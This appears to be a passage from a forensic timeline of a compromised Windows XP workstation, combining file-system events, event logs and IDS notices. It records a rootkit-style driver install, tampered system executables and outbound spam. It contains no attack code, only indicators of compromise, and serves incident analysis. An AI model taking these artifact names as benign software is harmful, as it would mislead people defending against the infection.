sa=164.107.xxx.177 sp=1592/tcp da=216.195.58.113 dp=2085/tcp num=16 msg=164.107.xxx.177/1592\ >\ 216.195.58.113/2085\ Apache\ (via\ HTTP)\ on\ port\ 2085/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-63afa402/19/09 10:35:01 accessed system@live[2].txt live.com/ Cookies -02/19/09 10:35:01 accessed [email protected][1].txt signup.live.com/ Cookies -02/19/09 10:35:13 accessed smith.99999@tacoda[3].txt tacoda.net/ Cookies -02/19/09 10:35:15 accessed [email protected][1].txtmsnaccountservices.112.2o7.net/ Cookies -02/19/09 10:35:17 accessed smith.99999@garciaworldshopping[1].txtgarciaworldshopping.com/ Cookies -02/19/09 10:35:17 accessed smith.99999@micksmarketplace[1].txtmicksmarketplace.com/ Cookies -02/19/09 10:35:17 accessed smith.99999@shopfrhomestore[1].txtshopfrhomestore.com/ Cookies -02/19/09 10:35:17 accessed smith.99999@toyowebmall[1].txttoyowebmall.com/ Cookies -02/19/09 10:35:21 accessed smith.99999@popunderadvertise[2].txtpopunderadvertise.com/ Cookies -02/19/09 10:35:24 accessed 
smith.99999@hafbargainmall[1].txthafbargainmall.com/ Cookies -02/19/09 10:35:25 accessed index.dat https://signup.live.com/signup.aspx?mkt=en-us&rollrs=12&lic=1 History\Visited Link -02/19/09 10:35:35 accessed smith.99999@kpbmarketing[1].txtkpbmarketing.com/ Cookies -02/19/09 10:35:36 accessed smith.99999@bronsonestopshop[1].txtbronsonestopshop.com/ Cookies -02/19/09 10:35:36 accessed smith.99999@wilsonfindings77[1].txtwilsonfindings77.com/ Cookies -
no=SMTP_PossibleInternalSpam na=NOTICE_EMAIL es=node01.1 sa=164.107.xxx.177 sp=1865/tcp da=212.227.15.134 dp=25/tcp msg=164.107.xxx.177\ appears\ to\ be\ spamming sub=sent:\ 319\ rejected:\ 30\ percent\ mailto:\ [email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected] tag=@83-10576-633f4b
02/19/09 10:35:37 accessed smith.99999@klywebmall[1].txt klywebmall.com/ Cookies -
02/19/09 10:35:37 accessed smith.99999@sharmanshoppingcenter[1].txt sharmanshoppingcenter.com/ Cookies -
02/19/09 10:35:42 accessed index.dat couponbar.coupons.com/ Cookies -
02/19/09 10:35:42 accessed system@coupons[1].txt coupons.com/ Cookies -
02/19/09 10:35:42 accessed system@google[1].txt google.com/ Cookies -
02/19/09 10:35:45 accessed [email protected][1].txt couponbar.coupons.com/ Cookies -
02/19/09 10:35:47 accessed stats[2].htm C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\BR3XKV9F\stats[2].htm Web Page Document Match File, Archive, Not Indexed
02/19/09 10:35:47 created stats[2].htm C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\BR3XKV9F\stats[2].htm Web Page Document Match File, Archive, Not Indexed
02/19/09 10:35:47 modified stats[2].htm C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\BR3XKV9F\stats[2].htm Web Page Document Match File, Archive, Not Indexed
02/19/09 10:35:47 written stats[2].htm C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\BR3XKV9F\stats[2].htm Web Page Document Match File, Archive, Not Indexed
02/19/09 10:35:57 logged SysEvent.Evt EVENT ID: 6006 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was stopped. -
02/19/09 10:36:18 system shutdown?
02/19/09 10:36:19 created zmzfozjg C:\\WINDOWS\zmzfozjg ! Bad signature File, Archive
02/19/09 10:36:19 modified zmzfozjg C:\\WINDOWS\zmzfozjg ! Bad signature File, Archive
02/19/09 10:36:19 written zmzfozjg C:\\WINDOWS\zmzfozjg ! Bad signature File, Archive
02/19/09 10:36:20 accessed seneka.sys C:\\WINDOWS\SYSTEM32\DRIVERS\seneka.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:36:20 created seneka.sys C:\\WINDOWS\SYSTEM32\DRIVERS\seneka.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:36:20 modified seneka.sys C:\\WINDOWS\SYSTEM32\DRIVERS\seneka.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:36:20 written seneka.sys C:\\WINDOWS\SYSTEM32\DRIVERS\seneka.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:37:01 system boots...
02/19/09 10:37:02 logged SysEvent.Evt EVENT ID: 9 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Broadcom 440x 10/100 Integrated Controller: Network controller configured for 100Mb full-duplex link. -
02/19/09 10:37:03 written seneka C:\\WINDOWS\SYSTEM32\CONFIG\SYSTEM\NTRegistry\$$$PROTO.HIV\ControlSet003\Services\seneka Folder ! Bad signature Folder, Registry Entry
02/19/09 10:37:03 written seneka C:\\WINDOWS\SYSTEM32\CONFIG\SYSTEM\NTRegistry\$$$PROTO.HIV\ControlSet004\Services\seneka Folder ! Bad signature Folder, Registry Entry
02/19/09 10:37:09 accessed DVDLauncher.exe C:\\Program Files\CyberLink\PowerDVD\DVDLauncher.exe Windows Executable Code\Executable File
02/19/09 10:37:09 accessed acrotray.exe C:\\Program Files\Adobe\Acrobat 7.0\Distillr\acrotray.exe Windows Executable Code\Executable File, Archive
02/19/09 10:37:09 accessed issch.exe C:\\Program Files\Common Files\InstallShield\UpdateService\issch.exe Windows Executable Code\Executable File, Archive
02/19/09 10:37:09 accessed senekafqqjlktq.dll C:\\WINDOWS\SYSTEM32\senekafqqjlktq.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:37:09 accessed senekalhtijurw.sys C:\\WINDOWS\SYSTEM32\DRIVERS\senekalhtijurw.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:37:09 accessed smax4pnp.exe C:\\Program Files\Analog Devices\Core\smax4pnp.exe Windows Executable Code\Executable File, Archive
02/19/09 10:37:09 modified senekafqqjlktq.dll C:\\WINDOWS\SYSTEM32\senekafqqjlktq.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:37:09 written senekafqqjlktq.dll C:\\WINDOWS\SYSTEM32\senekafqqjlktq.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:37:10 accessed ethqqaeg.sys C:\\WINDOWS\SYSTEM32\DRIVERS\ethqqaeg.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:37:12 accessed hiberfil.sys http://ubw.osu.edu/ubw_at_ohio.htm Bookmarks -
02/19/09 10:37:12 accessed hiberfil.sys http://ubw.osu.edu/underwater_basket_weaving_facilities_at_ohio.htm Bookmarks -
02/19/09 10:37:12 accessed hiberfil.sys http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=windowsm!a Bookmarks -
02/19/09 10:37:12 accessed hiberfil.sys http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=hotmail Bookmarks -
02/19/09 10:37:13 accessed zmzfozjg C:\\WINDOWS\zmzfozjg ! Bad signature File, Archive
02/19/09 10:37:22 logged SysEvent.Evt EVENT ID: 6009 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Microsoft (R) Windows (R) 5.01. 2600 Service Pack 3 Uniprocessor Free. -
02/19/09 10:37:22 logged SysEvent.Evt EVENT ID: 6005 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was started. -
02/19/09 10:37:43 bro no=ProtocolFound na=NOTICE_FILE es=node02.0 sa=164.107.xxx.177 sp=1033/tcp da=94.76.216.202 dp=9011/tcp num=16 msg=164.107.xxx.177/1033\ >\ 94.76.216.202/9011\ Apache\ (via\ HTTP)\ on\ port\ 9011/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-63fb81
02/19/09 10:38:16 logged SysEvent.Evt EVENT ID: 4226 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: TCP/IP has reached the security limit imposed on the number of concurrent TCP connect attempts. -
02/19/09 10:38:35 logged SysEvent.Evt EVENT ID: 11162 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The system failed to register host (A) resource records (RRs) for;network adapter with settings:; Adapter Name : {A45FF4F5-BE0B-4156-B8E8-7CFCB02CE985}; Host Name : hackedpc; Primary Domain Suffix : ubw.ohio-state.edu; DNS server list :; 164.107.xxx.29, 128.146.1.7, 128.146.48.7; Sent update to server : 164.1.1.1; IP Address(es) :; 164.107.xxx.177;The reason the system could not register these RRs was because the;update request it sent to the DNS server timed out. The most likely;cause of this is that the DNS server authoritative for the name it;was attempting to register or update is not running at this time.;You can manually retry DNS registration of the network adapter and;its settings by typing "ipconfig /registerdns" at the command prompt.;If problems still persist, contact your DNS server or network systems;administrator. -
02/19/09 10:38:36 modified smax4pnp.exe C:\\Program Files\Analog Devices\Core\smax4pnp.exe Windows Executable Code\Executable File, Archive
02/19/09 10:38:39 modified igfxtray.exe C:\\WINDOWS\SYSTEM32\igfxtray.exe Windows Executable Code\Executable File, Archive
02/19/09 10:38:40 modified hkcmd.exe C:\\WINDOWS\SYSTEM32\hkcmd.exe Windows Executable Code\Executable File, Archive
02/19/09 10:38:43 modified DVDLauncher.exe C:\\Program Files\CyberLink\PowerDVD\DVDLauncher.exe Windows Executable Code\Executable File
02/19/09 10:38:46 modified sgtray.exe C:\\Program Files\Common Files\Sonic\Update Manager\sgtray.exe Windows Executable Code\Executable File, Archive
02/19/09 10:38:48 accessed sgtray.exe C:\\Program Files\Common Files\Sonic\Update Manager\sgtray.exe Windows Executable Code\Executable File, Archive
02/19/09 10:39:00 modified acrotray.exe C:\\Program Files\Adobe\Acrobat 7.0\Distillr\acrotray.exe Windows Executable Code\Executable File, Archive
02/19/09 10:39:04 modified ISUSPM.exe C:\\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe Windows Executable Code\Executable File, Archive
02/19/09 10:39:06 accessed acrodist.exe C:\\Program Files\Adobe\Acrobat 7.0\Distillr\acrodist.exe Windows Executable Code\Executable File, Archive
02/19/09 10:39:07 accessed ISUSPM.exe C:\\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe Windows Executable Code\Executable File, Archive
02/19/09 10:39:07 modified issch.exe C:\\Program Files\Common Files\InstallShield\UpdateService\issch.exe Windows Executable Code\Executable File, Archive
02/19/09 10:39:27 accessed xccef090131.exe C:\\WINDOWS\SYSTEM\xccef090131.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:39:49 logged SysEvent.Evt EVENT ID: 10010 EVENT TYPE: ERROR EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The server {0002DF01-0000-0000-C000-000000000046} did not register with DCOM within the required timeout. -
02/19/09 10:39:53 modified SbTrayManager.exe C:\\Program Files\SafeBoot Tray Manager\SbTrayManager.exe Windows Executable Code\Executable File, Archive
02/19/09 10:39:54 accessed agent.exe C:\\Program Files\Common Files\InstallShield\UpdateService\agent.exe Windows Executable Code\Executable File, Archive
02/19/09 10:39:54 accessed TIMOUNTERMONITOR.EXE-1A929E4A.pf C:\WINDOWS\Prefetch\TIMOUNTERMONITOR.EXE-1A929E4A.pf
02/19/09 10:39:54 written TIMOUNTERMONITOR.EXE-1A929E4A.pf C:\WINDOWS\Prefetch\TIMOUNTERMONITOR.EXE-1A929E4A.pf
02/19/09 10:39:54 modified TIMOUNTERMONITOR.EXE-1A929E4A.pf C:\WINDOWS\Prefetch\TIMOUNTERMONITOR.EXE-1A929E4A.pf
02/19/09 10:39:54 accessed TRUEIMAGEMONITOR.EXE-08A65A75.pf C:\WINDOWS\Prefetch\TRUEIMAGEMONITOR.EXE-08A65A75.pf
02/19/09 10:39:54 written TRUEIMAGEMONITOR.EXE-08A65A75.pf C:\WINDOWS\Prefetch\TRUEIMAGEMONITOR.EXE-08A65A75.pf
02/19/09 10:39:54 modified TRUEIMAGEMONITOR.EXE-08A65A75.pf C:\WINDOWS\Prefetch\TRUEIMAGEMONITOR.EXE-08A65A75.pf
02/19/09 10:39:54 accessed UDATERUI.EXE-173C3AC6.pf C:\WINDOWS\Prefetch\UDATERUI.EXE-173C3AC6.pf
02/19/09 10:39:54 written UDATERUI.EXE-173C3AC6.pf C:\WINDOWS\Prefetch\UDATERUI.EXE-173C3AC6.pf
02/19/09 10:39:54 modified UDATERUI.EXE-173C3AC6.pf C:\WINDOWS\Prefetch\UDATERUI.EXE-173C3AC6.pf
02/19/09 10:39:55 written SCHEDHLP.EXE-29F59EF1.pf C:\WINDOWS\Prefetch\SCHEDHLP.EXE-29F59EF1.pf
02/19/09 10:39:55 modified SCHEDHLP.EXE-29F59EF1.pf C:\WINDOWS\Prefetch\SCHEDHLP.EXE-29F59EF1.pf
02/19/09 10:40:00 accessed SSMMGR.EXE-064D047E.pf C:\WINDOWS\Prefetch\SSMMGR.EXE-064D047E.pf
02/19/09 10:40:00 written SSMMGR.EXE-064D047E.pf C:\WINDOWS\Prefetch\SSMMGR.EXE-064D047E.pf
02/19/09 10:40:00 modified SSMMGR.EXE-064D047E.pf C:\WINDOWS\Prefetch\SSMMGR.EXE-064D047E.pf
02/19/09 10:40:02 accessed SCHEDHLP.EXE-29F59EF1.pf C:\WINDOWS\Prefetch\SCHEDHLP.EXE-29F59EF1.pf
02/19/09 10:40:05 logged SysEvent.Evt EVENT ID: 40961 EVENT TYPE: WARNING EVENT CATEGORY: SPNEGO (Negotiator) SID: COMPUTER: HACKEDPC DESCRIPTION: The Security System could not establish a secured connection with the server ldap/ubw.ohio-state.edu. No authentication protocol was available. -
02/19/09 10:40:05 accessed SBTRAYMANAGER.EXE-19E725FA.pf C:\WINDOWS\Prefetch\SBTRAYMANAGER.EXE-19E725FA.pf
02/19/09 10:40:05 written SBTRAYMANAGER.EXE-19E725FA.pf C:\WINDOWS\Prefetch\SBTRAYMANAGER.EXE-19E725FA.pf
02/19/09 10:40:05 modified SBTRAYMANAGER.EXE-19E725FA.pf C:\WINDOWS\Prefetch\SBTRAYMANAGER.EXE-19E725FA.pf
02/19/09 10:40:06 accessed SSMMgr.exe C:\\WINDOWS\Samsung\PanelMgr\SSMMgr.exe Windows Executable Code\Executable File, Archive
02/19/09 10:40:15 modified reader_s.exe C:\\WINDOWS\SYSTEM32\reader_s.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Fax service was successfully sent a stop control. -
02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7026 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The following boot-start or system-start driver(s) failed to load: ;irzylwcf;zmzfozjg -
02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service was successfully sent a start control. -
02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service was successfully sent a start control. -
02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service entered the running state. -
02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service entered the running state. -
02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service was successfully sent a start control. -
02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Network Connections service was successfully sent a start control. -
02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Network Connections service entered the running state. -
02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service was successfully sent a start control. -
02/19/09 10:40:19 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service entered the running state. -
02/19/09 10:40:20 modified services.exe C:\\WINDOWS\services.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:40:20 accessed SHSTAT.EXE-34E0D8DA.pf C:\WINDOWS\Prefetch\SHSTAT.EXE-34E0D8DA.pf
02/19/09 10:40:20 written SHSTAT.EXE-34E0D8DA.pf C:\WINDOWS\Prefetch\SHSTAT.EXE-34E0D8DA.pf
02/19/09 10:40:20 modified SHSTAT.EXE-34E0D8DA.pf C:\WINDOWS\Prefetch\SHSTAT.EXE-34E0D8DA.pf
02/19/09 10:40:21 accessed services.exe C:\\WINDOWS\services.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:40:21 modified rundll32.exe C:\\WINDOWS\SYSTEM32\rundll32.exe Windows Executable Code\Executable File, Archive
02/19/09 10:40:23 written USERINIT.EXE-0743FDA9.pf C:\WINDOWS\Prefetch\USERINIT.EXE-0743FDA9.pf
02/19/09 10:40:23 modified USERINIT.EXE-0743FDA9.pf C:\WINDOWS\Prefetch\USERINIT.EXE-0743FDA9.pf
02/19/09 10:40:27 accessed USERINIT.EXE-0743FDA9.pf C:\WINDOWS\Prefetch\USERINIT.EXE-0743FDA9.pf
02/19/09 10:40:31 accessed Weather.exe C:\\Program Files\AWS\WeatherBug\Weather.exe Windows Executable Code\Executable File, Archive
02/19/09 10:40:34 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service entered the running state. -
02/19/09 10:40:34 modified ctfmon.exe C:\\WINDOWS\SYSTEM32\ctfmon.exe Windows Executable Code\Executable File, Archive
02/19/09 10:40:41 accessed WEATHER.EXE-16549C68.pf C:\WINDOWS\Prefetch\WEATHER.EXE-16549C68.pf
02/19/09 10:40:41 written WEATHER.EXE-16549C68.pf C:\WINDOWS\Prefetch\WEATHER.EXE-16549C68.pf
02/19/09 10:40:41 modified WEATHER.EXE-16549C68.pf C:\WINDOWS\Prefetch\WEATHER.EXE-16549C68.pf
02/19/09 10:40:42 modified TransferAgent.exe C:\\Documents and Settings\All Users\Application Data\Dell\TransferAgent\TransferAgent.exe Windows Executable Code\Executable File, Archive
02/19/09 10:40:44 modified prunnet.exe C:\\WINDOWS\SYSTEM32\prunnet.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:40:45 accessed TransferAgent.exe C:\\Documents and Settings\All Users\Application Data\Dell\TransferAgent\TransferAgent.exe Windows Executable Code\Executable File, Archive
02/19/09 10:40:47 logged SysEvent.Evt EVENT ID: 26 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Application popup: TransferAgent.exe - Application Error : The application failed to initialize properly (0xc000007b). Click on OK to terminate the application. -
02/19/09 10:40:54 accessed PRUNNET.EXE-18A96408.pf C:\WINDOWS\Prefetch\PRUNNET.EXE-18A96408.pf
02/19/09 10:40:54 written PRUNNET.EXE-18A96408.pf C:\WINDOWS\Prefetch\PRUNNET.EXE-18A96408.pf
02/19/09 10:40:54 modified PRUNNET.EXE-18A96408.pf C:\WINDOWS\Prefetch\PRUNNET.EXE-18A96408.pf
02/19/09 10:40:54 accessed PRUNNET.EXE-18A96408.pf C:\WINDOWS\Prefetch\PRUNNET.EXE-18A96408.pf
02/19/09 10:40:54 written PRUNNET.EXE-18A96408.pf C:\WINDOWS\Prefetch\PRUNNET.EXE-18A96408.pf
02/19/09 10:40:54 modified PRUNNET.EXE-18A96408.pf C:\WINDOWS\Prefetch\PRUNNET.EXE-18A96408.pf
02/19/09 10:40:56 accessed TRANSFERAGENT.EXE-19919614.pf C:\WINDOWS\Prefetch\TRANSFERAGENT.EXE-19919614.pf
02/19/09 10:40:56 written TRANSFERAGENT.EXE-19919614.pf C:\WINDOWS\Prefetch\TRANSFERAGENT.EXE-19919614.pf
02/19/09 10:40:56 modified TRANSFERAGENT.EXE-19919614.pf C:\WINDOWS\Prefetch\TRANSFERAGENT.EXE-19919614.pf
02/19/09 10:41:29 accessed msmsgs.exe C:\\Program Files\Messenger\msmsgs.exe Windows Executable Code\Executable File, Archive
02/19/09 10:41:30 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The DSproct service was successfully sent a start control. -
02/19/09 10:41:31 accessed index.dat http://ubw.osu.edu History\Daily -
02/19/09 10:43:14 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:43:14 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:43:25 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:44:24 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:44:25 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:44:36 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:44:43 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:44:43 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:44:52 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:44:59 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:44:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:45:08 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:45:12 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:45:12 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:45:23 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:45:27 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:45:27 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:45:37 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:45:42 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:45:42 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:45:51 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:45:56 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:45:57 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:46:06 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:46:11 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:46:12 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:46:21 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:46:25 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:46:25 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:46:35 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:46:40 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:46:41 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:46:50 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
